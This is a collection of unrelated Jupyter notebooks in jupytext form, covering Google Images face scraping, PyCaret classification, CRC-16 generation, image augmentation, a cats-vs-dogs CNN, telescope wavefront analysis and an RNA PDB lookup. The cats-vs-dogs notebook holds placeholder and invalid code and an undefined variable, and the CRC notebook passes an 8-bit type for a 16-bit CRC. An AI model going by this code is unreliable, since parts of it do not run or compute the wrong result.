plt.plot(xx,gaussian(xx,mu,sigma),color="red")
plt.ylim([0,0.5])
plt.xlim([-5,5])
plt.gca().set_aspect(20)
plt.xlabel('x')
plt.ylabel('y(x)')
plt.show()
|
simplegaussian.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## 2020년 9월 5일 토요일
# ### leetCode - Add Strings (Python)
# ### 문제 : https://leetcode.com/problems/add-strings/
# ### 블로그 : https://somjang.tistory.com/entry/leetCode-415-Add-Strings-Python
# ### 첫번째 시도
class Solution(object):
def addStrings(self, num1, num2):
answer_list = []
carry = 0
index1, index2 = len(num1), len(num2)
while index1 or index2 or carry:
digit = carry
if index1:
index1 -= 1
digit += int(num1[index1])
if index2:
index2 -= 1
digit += int(num2[index2])
carry = digit > 9
answer_list.append(str(digit % 10))
return ''.join(answer_list[::-1])
|
DAY 101 ~ 200/DAY199_[leetCode] Add Strings (Python).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/"} id="VIxtnx180jS9" executionInfo={"status": "ok", "timestamp": 1642319114763, "user_tz": 480, "elapsed": 17409, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="73444e58-2fad-4d5a-8bcc-2ab60a67ae1a"
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
# + id="9FgJno7he4HY"
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Unscreened_Data/Happy/
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Data/Happy/
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Past_Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Unscreened_Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Past_Data/Happy/
# + id="k8wap5Gez478" executionInfo={"status": "ok", "timestamp": 1642319122091, "user_tz": 480, "elapsed": 684, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
# #%pip install bs4
import os
from bs4 import BeautifulSoup
import requests as req
import urllib
import pandas as pd
import cv2
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
import sys
#VERY IMPORTANT: Make sure to iterate the number below by 1 before starting the scraping!!!!!
iteration = 50
# + id="ueOqQN-NKXyC" executionInfo={"status": "ok", "timestamp": 1642319122092, "user_tz": 480, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
# from google.colab import drive
# drive.mount('/content/gdrive', force_remount=True)
# + id="j7AgoEnrwpZa" executionInfo={"status": "ok", "timestamp": 1642319124517, "user_tz": 480, "elapsed": 1702, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
my_lib_path = os.path.abspath('./gdrive/Shareddrives/RoseHack/')
sys.path.append(my_lib_path)
from landmarks import firstmodify, ifoverborder, finalmodify
net = cv2.dnn.readNetFromCaffe('./gdrive/Shareddrives/RoseHack/deploy.prototxt.txt', './gdrive/Shareddrives/RoseHack/res10_300x300_ssd_iter_140000.caffemodel')
# + id="6vwSQNIVtwFt"
key = "Happy"
# + id="h5a17L8rimoo"
def deep_convert(f, return_rectangle = False, save_img=False):
image = cv2.imread(f)
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detections = net.forward()
height, width, channels = image.shape
green = (0, 255, 0)
line_thick = round(height/120)
for i in range(0, detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > 0.3:
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
len = detections[0, 0, i, 3:7]
if len[3] < 1:
(startX, startY, endX, endY) = box.astype("int")
startX = max(startX, 0)
startY = max(startY, 0)
#print(startX, startY)
left, right, up, bottom = firstmodify(startX, endX, startY, endY)
#print("1",left, right, up, bottom)
left, right, up, bottom = ifoverborder(left, right, up, bottom, w, h)
#print("2",left, right, up, bottom)
left, right, up, bottom = finalmodify(left, right, up, bottom)
#print("3",left, right, up, bottom)
#print(left, right, up, bottom)
roi = image[up:bottom, left:right]
#roi = image[startY:endY, startX:endX]
roi_224 = cv2.resize(roi, (224,224), interpolation = cv2.INTER_AREA)
head, tail = os.path.split(f)
#cv2.rectangle(image, (left, up), (right, bottom), green, thickness=line_thick)
output_dir = './gdrive/Shareddrives/RoseHack/Face_Data/Data/' + key + "/" + str(iteration) + f.split("/")[-1]
print(output_dir)
cv2.imwrite(output_dir, roi_224)
#roi = cv2.resize(roi, (200,200), interpolation = cv2.INTER_AREA)
output = cv2.cvtColor(roi_224, cv2.COLOR_BGR2RGB)
temp_output = output/255.
return temp_output, output_dir
# + id="awCrSvrEfukb"
# + id="59OrqmZf0BAD"
search_words = ["cheerful faces"]
img_dir = "./gdrive/Shareddrives/RoseHack/Face_Data/Unscreened_Data/" + key + "/"
for s in range(len(search_words)):
#Sources with free photos
search_words[s] = "unsplash photos of " + search_words[s]
search_words.append("pexels photos of " + search_words[s])
search_words.append("pixabay photos of " + search_words[s])
search_words.append("freeimages photos of " + search_words[s])
# + [markdown] id="1RKHcQ5EfPhR"
#
# + id="BIpaknTx2C2P"
for word in search_words:
dir_path = img_dir + word.replace(" ","_")
urlKeyword = urllib.parse.quote((word))
url = "https://www.google.com/search?hl=jp&q=" + urlKeyword + "&btnG=Google+Search&tbs=0&safe=off&tbm=isch"
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15",}
r = urllib.request.Request(url=url, headers=headers)
page = urllib.request.urlopen(r)
html = page.read().decode("utf-8")
ht = BeautifulSoup(html, "html.parser")
elems = ht.findAll("img", {"class":"rg_i Q4LuWd"})
for li in range(len(elems)):
#i+=1
if str(elems[li]).find("https")!=-1:
if str(elems[li]).find("Unsplash")!=-1 or str(elems[li]).find("Pexels")!=-1 or str(elems[li]).find("Pixabay")!=-1:
ele = elems[li]
ele = str(ele).replace('"','').split('src=')
eledict = dict()
ele = ele[-1].split(" ")
imageURL = ele[0]
file_path = dir_path + str(li) + ".jpg"
try:
urllib.request.urlretrieve(imageURL, file_path)
img = Image.open(file_path).convert("RGB")
img.save(file_path)
if os.path.getsize(file_path)<130000:
#print(os.path.getsize(file_path))
img2 = Image.open(file_path)
new_img = img2.resize((2000,2000))
new_img.save(file_path)
except:
"Unable to download " + word + " image " + str(li)
# + id="QueMMvJlwI0X"
import tensorflow as tf
from tensorflow.keras.models import load_model
import shutil
import numpy as np
import random
import os
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# + id="qufYseGAPvV-" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1642292255159, "user_tz": 480, "elapsed": 51442, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="c86dad3f-6afd-4e9e-8603-e019cb4d9f49"
#categories = ["Crime", "Crime_Alert", "Emergency", "Medical", "Medical_Alert", "No_Action", "No_Emergency"]
source = "./gdrive/Shareddrives/RoseHack/Face_Data/Unscreened_Data/" + key + "/"
dest = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/" + key + "/"
past = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/"
files0 = os.listdir(past)
files = os.listdir(source)
img_ref = []
for r in files0:
img_path = past + r
im = load_img(img_path, target_size=(224, 224), grayscale=False)
img_ref.append(im)
for f in files:
img_path = source + f
img = load_img(img_path, target_size=(224, 224), grayscale=False) # this is a PIL image
#Screening:
# match = 0
# for f0 in files0:
# img_path0 = fdir0 + f0
# img0 = load_img(img_path0, target_size=(224,224), grayscale=False)
# if (np.array(img) == np.array(img0)).all():
# match+=1
match = 0
f0 = 0
while match==0 and f0<len(img_ref):
if (np.array(img) == np.array(img_ref[f0])).all():
match+=1
f0+=1
if match<1:
#shutil.copy(img_path, past + f)
try:
img00, img_dir00 = deep_convert(img_path)
except:
print("Discard")
shutil.move(img_path, past + f)
print(dest + f)
else:
print("Repeat detected: Discarding image " + img_path)
os.remove(img_path)
# + colab={"base_uri": "https://localhost:8080/"} id="PJM5E7O5g45M" executionInfo={"status": "ok", "timestamp": 1642297185665, "user_tz": 480, "elapsed": 259, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="604e44c0-8cb8-422c-e4bf-39c52583e96a"
# !ls ./gdrive/Shareddrives/RoseHack/Face_Data/Data/Neither/ | wc -l
# + id="0OXS6kHwhBKz"
# happy = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/Happy/"
# sad = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/Sad/"
# files0 = os.listdir(happy)
# print(len(files0))
# for f in files0:
# if f in os.listdir(happy):
# img_path0 = happy + f
# img = load_img(img_path0, target_size=(224, 224), grayscale=False)
# files = os.listdir(happy)
# files.remove(f)
# match = False
# r = 0
# print(len(files))
# while r < len(files) and match==False:
# img_path = happy + files[r]
# try:
# im = load_img(img_path, target_size=(224, 224), grayscale=False)
# if (np.array(img) == np.array(im)).all():
# match = True
# print("Match")
# except:
# print("Failed")
# r+=1
# if match==True:
# os.remove(img_path)
# match = 0
# f0 = 0
# while match==0 and f0<len(img_ref):
# if (np.array(img) == np.array(img_ref[f0])).all():
# match+=1
# f0+=1
# if match>=1:
# + id="sTp5PZZ8Eom-"
#img_path
# + id="LUNRefX3Fcat"
# dir = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/Neither/"
# dest = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/"
# files = os.listdir(dir)
# for f in files:
# shutil.move(dir + f, dest + f)
# + id="Xe2D0HKORdXz"
|
Data/WebScraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
column_names = ["sex", "length", "diameter", "height", "whole weight",
"shucked weight", "viscera weight", "shell weight", "rings"]
dataset = pd.read_csv("abalone.data", names=column_names)
print(dataset.shape)
dataset.head()
# +
data = dataset.sample(frac=0.9, random_state=786)
data_unseen = dataset.drop(data.index)
data.reset_index(drop=True, inplace=True)
data_unseen.reset_index(drop=True, inplace=True)
print('Data for Modeling: ' + str(data.shape))
print('Unseen Data For Predictions: ' + str(data_unseen.shape))
# -
from pycaret.classification import *
exp_mclf101 = setup(data = data, target = 'sex', session_id=123)
best = compare_models()
# Logistic Regression
lr = create_model('lr')
tuned_lr = tune_model(lr)
final_lr = finalize_model(tuned_lr)
predictions_lr = predict_model(final_lr, data=data_unseen)
sum(predictions_lr['Score'])/len(predictions_lr['Score'])
# Gradient Boosting Classifier
gbc = create_model('gbc')
tuned_gbc = tune_model(gbc)
predict_model(tuned_gbc);
final_gbc = finalize_model(tuned_gbc)
predictions_gbc = predict_model(final_gbc, data=data_unseen)
sum(predictions_gbc['Score'])/len(predictions_gbc['Score'])
# Random Forest Classifier
rf = create_model('rf')
tuned_rf = tune_model(rf)
predict_model(tuned_rf);
final_rf = finalize_model(tuned_rf)
predictions_rf = predict_model(final_rf, data=data_unseen)
sum(predictions_rf['Score'])/len(predictions_rf['Score'])
plot_model(tuned_lr, plot = 'confusion_matrix')
plot_model(tuned_gbc, plot = 'confusion_matrix')
plot_model(tuned_rf, plot = 'confusion_matrix')
plot_model(tuned_lr, plot='class_report')
plot_model(tuned_gbc, plot = 'class_report')
plot_model(tuned_rf, plot = 'class_report')
|
Project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## CRC Polynomial 0x9EB2
#
# \begin{equation*}
# P(x) = x^{16}+x^{15}+x^{12}+x^{11}+x^{10}+x^{9}+x^{7}+x^{5}+x^{4}+x^{1}
# \end{equation*}
# ```
# bits in polynomial
#
# 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
# 1 1 0 0 1 1 1 1 0 1 0 1 1 0 0 1 0
# --> 19EB2
# ```
#
#
# # Requirements
#
# * install crcmod
#
import crcmod
# ## construct crc-function
poly = 0x19eb2
initCrc = 0
rev = True
xorOut = 0
crc16fun = crcmod.mkCrcFun(poly=poly, initCrc=initCrc, rev=rev, xorOut=xorOut)
# ## example message
#
# Sequence missing: CRC output of 0x02 0x12 0xB1 0xB2 should be 0xC4
data = b'\x02\x12\xB1\xB2'
print(data)
check = crc16fun(data)
hex(check)
# ## Code Generation
crc16 = crcmod.Crc(poly=poly, initCrc=initCrc, rev=rev, xorOut=xorOut)
filename = "crc16function.c"
with open(filename, 'w') as fp:
crc16.generateCode(functionName="crc16", out=fp, dataType='uint8_t', crcType='uint8_t')
|
tools/crc/crc16-0x9eb2h.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.11 64-bit (''bertopic_explore'': conda)'
# name: python3
# ---
# # Qualitatitive topic evaluations
# This notebook is used for formatting the data for qualitative evaluations. This includes:
# - Inspecting the topic words
# - Inspecting representative documents
# - Coming up with good "titles" for the topics
#
# Notes on TweetEval:
# - 10 topics may be too much :((
# - Difficult to classify?
import pickle
import numpy as np
import pandas as pd
import re
from pprint import pprint
from typing import Dict, Tuple, List, Union
from bertopic import BERTopic
from pathlib import Path
# +
def read_pickle(file_path):
with open(file_path, "rb") as f:
return pickle.load(f)
def get_model_name(model_path: Path) -> str:
return re.match("\w+-\w+-\d+", model_path.name).group()
def create_topic_dict(raw_topic_dict: Dict[int, Tuple[str, int]]) -> Dict[int, List[str]]:
return {k: [tup[0] for tup in lst] for k, lst in raw_topic_dict.items() if k!=-1}
def latest_full_topics(dr: Path) -> Path:
return list(dr.glob("*full_doc_topics_*.csv"))[-1]
# -
DATA_DIR = Path("../data")
MODEL_DIR = Path("../../ExplainlpTwitter/output")
model_path = ""
model = BERTopic.load(model_path)
# +
doc_topics = pd.read_csv(latest_full_topics(DATA_DIR), index_col=0)
doc_topics
topic_words = read_pickle(DATA_DIR / "tweeteval_topic_dict.pkl" )
clean_tweets = pd.read_csv(DATA_DIR / "tweeteval_text.csv", usecols=["text"])
doc_topics = doc_topics.merge(clean_tweets, left_index=True, right_index=True)
# -
# ## Looking at topic words
topic_dict = create_topic_dict(topic_words)
pprint(topic_dict)
doc_topics.groupby("topic").size()
for top, words in topic_dict.items():
print(f"evaluating topic {top}")
pprint(f"{words = }")
print(f"examples for topic {top}")
example_tweets = doc_topics.loc[doc_topics["topic"] == top, "text"].sample(10, random_state=42).tolist()
print(example_tweets)
print("")
|
src/QualitativeEvaluations.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Image Augmentation Like a Pro!
# !wget https://images-americanas.b2w.io/produtos/01/00/img/1474047/1/1474047100_1SZ.jpg
# !wget https://images-americanas.b2w.io/produtos/01/00/img/1474047/1/1474047100_3SZ.jpg
# !pip3 install tensorflow_addons --quiet
import tensorflow as tf
import tensorflow_addons as tfa
from matplotlib import pyplot as plt
# +
img1 = tf.io.decode_image(tf.io.gfile.GFile("1474047100_1SZ.jpg", "rb").read())
img2 = tf.io.decode_image(tf.io.gfile.GFile("1474047100_3SZ.jpg", "rb").read())
imgs = tf.stack([img1, img2])
for img in imgs:
plt.imshow(img)
plt.show()
# +
import math
IMAGE_SIZE = [256, 256]
def random_crop_image_squares(imgs, minstart=0, maxstart=0.25, minsize=0.75, maxsize=1.0, ouput_size=IMAGE_SIZE):
a = tf.random.uniform(shape=(imgs.shape[0], 2), minval=minstart, maxval=maxstart)
b = tf.random.uniform(shape=(imgs.shape[0], 2), minval=minsize, maxval=maxsize)
boxes = tf.concat([a, tf.clip_by_value(a + b, 0.0, 1.0)], axis=1)
return tf.image.crop_and_resize(imgs, boxes, tf.range(imgs.shape[0]), ouput_size)
def gaussian_noise_images(imgs, mean=0.0, stddev=1.0):
noise = tf.random.normal(shape=tf.shape(imgs), mean=mean, stddev=stddev, dtype=tf.float32)
return tf.clip_by_value(imgs + noise, 0, 255)
def _distorce_image(imgs, rotate_graus=360):
_length = tf.shape(imgs)[0]
_imgs = tf.image.resize(imgs, IMAGE_SIZE)
_imgs = tf.image.random_flip_left_right(_imgs)
_imgs = tf.image.random_hue(_imgs, 0.08)
_imgs = tf.image.random_saturation(_imgs, 0.1, 1.6)
_imgs = tf.image.random_brightness(_imgs, 0.1)
_imgs = tf.image.random_contrast(_imgs, 0.7, 1.3)
_imgs = gaussian_noise_images(_imgs, mean=0.0, stddev=10.0)
_imgs = tfa.image.rotate(_imgs, tf.random.uniform(shape=[_length], minval=0.0, maxval=(math.pi / 180) * rotate_graus))
return random_crop_image_squares(_imgs, ouput_size=IMAGE_SIZE)
for img in _distorce_image(imgs, 360):
plt.imshow(tf.cast(img, tf.int32))
plt.show()
# -
|
tensorflow/Image Data Augmentation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# Python program to create
# Image Classifier using CNN
# Importing the required libraries
import os
import numpy as np
from random import shuffle
# -
TRAIN_DIR = 'E:/dataset / Cats_vs_Dogs / train'
TEST_DIR = 'E:/dataset / Cats_vs_Dogs / test1'
#IMG_SIZE = 50
LR = 1e-3
'''Setting up the model which will help with tensorflow models'''
MODEL_NAME = 'dogsvscats-{}-{}.model'.format(LR, '6conv-basic')
# +
# Creating an empty list where we should the store the training data
# after a little preprocessing of the data
training_data = []
#array of all the data two star variable joined(array of 2 variables as array1[] and array2[])
..........
arrays=array1.append.array2
#giving label
#label and array(aa) appended in list training_data in major file
#
# shuffling of the training data to preserve the random state of our data
shuffle(training_data)
np.save('training_data.npy', training_data)
np.save('testing_data.npy',testing_data)
# +
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
import tensorflow as tf
tf.reset_default_graph()
convnet = input_data(shape =[None, IMG_SIZE, IMG_SIZE, 1], name ='input')
convnet = conv_2d(convnet, 32, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 64, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 128, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 64, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = conv_2d(convnet, 32, 5, activation ='relu')
convnet = max_pool_2d(convnet, 5)
convnet = fully_connected(convnet, 1024, activation ='relu')
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 2, activation ='softmax')
convnet = regression(convnet, optimizer ='adam', learning_rate = LR,
loss ='categorical_crossentropy', name ='targets')
model = tflearn.DNN(convnet, tensorboard_dir ='log')
# Splitting the testing data and training data
train = training_data[:-500]
test = training_data[-500:]
'''Setting up the features and lables'''
# X-Features & Y-Labels
X = np.array([i[0] for i in train]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
test_y = [i[1] for i in test]
'''Fitting the data into our model'''
# epoch = 5 taken
model.fit({'input': X}, {'targets': Y}, n_epoch = 5,
validation_set =({'input': test_x}, {'targets': test_y}),
snapshot_step = 500, show_metric = True, run_id = MODEL_NAME)
model.save(MODEL_NAME)
'''Testing the data'''
import matplotlib.pyplot as plt
# if you need to create the data:
# test_data = process_test_data()
# if you already have some saved:
test_data = np.load('test_data.npy')
fig = plt.figure()
for num, data in enumerate(test_data[:20]):
# cat: [1, 0]
# dog: [0, 1]
img_num = data[1]
img_data = data[0]
y = fig.add_subplot(4, 5, num + 1)
orig = img_data
data = img_data.reshape(IMG_SIZE, IMG_SIZE, 1)
# model_out = model.predict([data])[0]
model_out = model.predict([data])[0]
if np.argmax(model_out) == 1: str_label ='Dog'
else: str_label ='Cat'
y.imshow(orig, cmap ='gray')
plt.title(str_label)
y.axes.get_xaxis().set_visible(False)
y.axes.get_yaxis().set_visible(False)
plt.show()
# -
# <h1>Dealing with images</h1>
# +
'''Labelling the dataset'''
def label_img(img):
word_label = img.split('.')[-3]
# DIY One hot encoder
if word_label == 'cat': return [1, 0]
elif word_label == 'dog': return [0, 1]
"""Creating the training data"""
def create_train_data():
# Creating an empty list where we should the store the training data
# after a little preprocessing of the data
training_data = []
# tqdm is only used for interactive loading
# loading the training data
for img in tqdm(os.listdir(TRAIN_DIR)):
# labeling the images
label = label_img(img)
path = os.path.join(TRAIN_DIR, img)
# loading the image from the path and then converting them into
# greyscale for easier covnet prob
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# resizing the image for processing them in the covnet
img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# final step-forming the training data list with numpy array of the images
training_data.append([np.array(img), np.array(label)])
# shuffling of the training data to preserve the random state of our data
shuffle(training_data)
# saving our trained data for further uses if required
np.save('train_data.npy', training_data)
return training_data
'''Processing the given test data'''
# Almost same as processing the traning data but
# we dont have to label it.
def process_test_data():
testing_data = []
for img in tqdm(os.listdir(TEST_DIR)):
path = os.path.join(TEST_DIR, img)
img_num = img.split('.')[0]
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
testing_data.append([np.array(img), img_num])
shuffle(testing_data)
np.save('test_data.npy', testing_data)
return testing_data
|
all_codes/keras model/keras model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import sys
import numpy as np
import math
import ceo
import matplotlib.pyplot as plt
import IPython
# %matplotlib inline
# Telescope parameters
D = 26.
nPx = 469
radial_order = 4
gmt = ceo.GMT_MX(D,nPx,M1_radial_order=radial_order,M2_radial_order=radial_order)
# +
# on-axis WFS parameters
nLenslet = 26 # number of sub-apertures across the pupil
n = 18 # number of pixels per subaperture
detectorRes = 2*n*nLenslet/2
BINNING = 2
# Initialize on-axis GS and WFS
ongs = ceo.Source("R",zenith=0.,azimuth=0., rays_box_size=D,rays_box_sampling=nPx,rays_origin=[0.0,0.0,25])
wfs = ceo.ShackHartmann(nLenslet, n, D/nLenslet,N_PX_IMAGE=2*n,BIN_IMAGE=BINNING,N_GS=1)
# Calibrate WFS slope null vector
ongs.reset()
gmt.reset() # Telescope perfectly phased
gmt.propagate(ongs)
wfs.calibrate(ongs,0.8)
plt.imshow(wfs.flux.host(shape=(nLenslet,nLenslet)),interpolation='none')
# -
print wfs.frame.shape
print "pupil sampling: %d pixel"%nPx
print "Pixel size: %.3farcsec"%(wfs.pixel_scale_arcsec)
sh_fov = wfs.pixel_scale_arcsec*wfs.N_PX_IMAGE/BINNING
print "Field of view: %.3farcsec"%(sh_fov)
# +
#Get residual WF solely due to telescope aberrations when perfectly aligned
ongs.reset()
gmt.reset()
gmt.propagate(ongs)
Wref = np.rollaxis( ongs.wavefront.phase.host(units='nm', shape=(1,ongs.N_SRC,ongs.n*ongs.m)),1,3)
#Put some Zernike modes on M1 segments and get the WF
zmode = np.array((2,4,6,8,10,11))
zstroke = 250e-9 #m rms SURF
ongs.reset()
gmt.reset()
for ii in range(zmode.size):
gmt.M1.zernike.a[ii,zmode[ii]] = zstroke
gmt.M1.zernike.update()
gmt.propagate(ongs)
W = np.rollaxis( ongs.wavefront.phase.host(units='nm', shape=(1,ongs.N_SRC,ongs.n*ongs.m)),1,3)
print W.shape
plt.imshow(ongs.phase.host(units='nm'),interpolation='None',cmap='RdYlBu')
plt.colorbar()
plt.title("nm WF")
# +
## Initialize the projection of segment phasemaps onto Zernikes
Zobj = ceo.ZernikeS(radial_order)
P = np.rollaxis( np.array( ongs.rays.piston_mask ),0,3)
# Find center coordinates (in pixels) of each segment mask
u = np.arange(ongs.n)
v = np.arange(ongs.m)
x,y = np.meshgrid(u,v)
x = x.reshape(1,-1,1)
y = y.reshape(1,-1,1)
xc = np.sum(x*P,axis=1)/P.sum(axis=1)
yc = np.sum(y*P,axis=1)/P.sum(axis=1)
# Preliminary estimation of radius (in pixels) of each segment mask (assuming that there is no central obscuration)
Rs = np.sqrt(P.sum(axis=1)/np.pi)
# Polar coordinates
rho = np.hypot( x - xc[:,np.newaxis,:], y - yc[:,np.newaxis,:]) #temporal rho vector
theta = np.arctan2( y - yc[:,np.newaxis,:], x - xc[:,np.newaxis,:]) * P
#Estimate central obscuration area of each segment mask
ObsArea = np.sum(rho < 0.9*Rs[:,np.newaxis,:] * ~P.astype('bool'), axis=1)
#Improve estimation of radius of each segment mask
Rs = np.sqrt( (P.sum(axis=1)+ObsArea) / np.pi)
#Normalize rho vector (unitary radius)
rho = rho / Rs[:,np.newaxis,:] #final rho vector
#caca = rho[3,:,:].reshape(ongs.n,ongs.m)
#plt.imshow(caca)
#plt.colorbar()
# +
#Project a segment at a time:
segId = 1
alphaId = 0 #direction in the FoV (in case N_SRC > 0)
cutheta = ceo.cuDoubleArray(host_data=theta[segId-1,:,alphaId].reshape(ongs.m,ongs.n))
curho = ceo.cuDoubleArray(host_data= rho[segId-1,:,alphaId].reshape(ongs.m,ongs.n))
#myphase = ((W-Wref)[:,:,alphaId]*P[segId-1,:,alphaId]).reshape(ongs.n,ongs.m) #just the WF over one segment
myphase = (W-Wref)[:,:,alphaId].reshape(ongs.n,ongs.m)*P[0,:].reshape(nPx,nPx)
cuW = ceo.cuFloatArray(host_data=myphase)
plt.imshow(cuW.host())
plt.colorbar()
Zobj.projection(cuW, curho, cutheta)
print np.array_str(Zobj.a,precision=3,suppress_small=True)
# -
print np.mean(myphase[P[0,:].reshape(nPx,nPx)==1])
Zobj.update()
ZS = Zobj.surface(curho,cutheta)
plt.imshow(ZS.host()*P[0,:].reshape(nPx,nPx))
plt.colorbar()
Zobj.reset()
Z = np.zeros((nPx*nPx,Zobj.n_mode))
for k in range(Zobj.n_mode):
Zobj.a[0,k] = 1
Zobj.update()
S = Zobj.surface(curho,cutheta).host(shape=(nPx*nPx,1))*P[0,:].reshape(-1,1)
Z[:,k] = S.flatten()
Zobj.a[0,k] = 0
S.shape
plt.imshow(S.reshape(nPx,nPx))
plt.colorbar()
GZ = np.dot(Z.T,Z)/P[0,:].sum()
plt.imshow(GZ-np.eye(Zobj.n_mode),interpolation='None')
plt.colorbar()
|
notebooks/Segment-Zernike-Projection.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/philpham8/FindRepresentativeRNAChains/blob/main/FindRepresentativeRNAChains_Phillip.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="ekKURWsfbFUL"
# Developed by <NAME> on 05/2021
#
# Search non-redundant RNAs on Protein Data Base using these criteria:
#
# * Variable length of nucleotides (min and max cutoffs)
# * No branched polymers (carbohydrates or oligosaccharide)
# * Resolution cutoff in Angstroms (as determined by URL on rna.BGSU.edu
#
# Also contains the function to lookup ligands and generate a XLSX spreadsheet with information on chain length, title, and ligand nonpolymers (intentionally excluding ions).
# + id="9-yPDMUPS4MK"
import requests
import pandas as pd
explicit_ions = ['K', 'MG', 'NA', 'SR', 'BA', 'MN', 'CD', 'TL', 'SO4', 'IRI', 'ACT']
def json_from_url(url):
response = requests.get(url, timeout=5)
if response.status_code == requests.codes.ok: return response.json()
else: return
# Fetch PubMed data with requested PDB ID on PDB.
def get_pdb_pubmed(pdb_id):
request_url = "https://data.rcsb.org/rest/v1/core/pubmed"
return json_from_url(request_url + '/' + pdb_id)
# Fetch Nonpolymer data with requested Nonpolymer ID on PDB.
def get_pdb_nonpolymer(pdb_id, nonpolymer_id):
request_url = 'https://data.rcsb.org/rest/v1/core/nonpolymer_entity'
return json_from_url(request_url + '/' + pdb_id + '/' + nonpolymer_id)
# Fetch Chemical Composition data with requested Comp ID on PDB.
def get_pdb_chemcomp(comp_id):
request_url = 'https://data.rcsb.org/rest/v1/core/chemcomp'
return json_from_url(request_url + '/' + comp_id)
# Fetch information on requested PDB entry
def get_pdb_entry(pdb_id):
request_url = "https://data.rcsb.org/rest/v1/core/entry"
return json_from_url(request_url + '/' + pdb_id)
# Fetch information on requested PDB entity/chain (e.g. individual RNA)
def get_pdb_entity(pdb_id, chain_id):
request_url = "https://data.rcsb.org/rest/v1/core/polymer_entity"
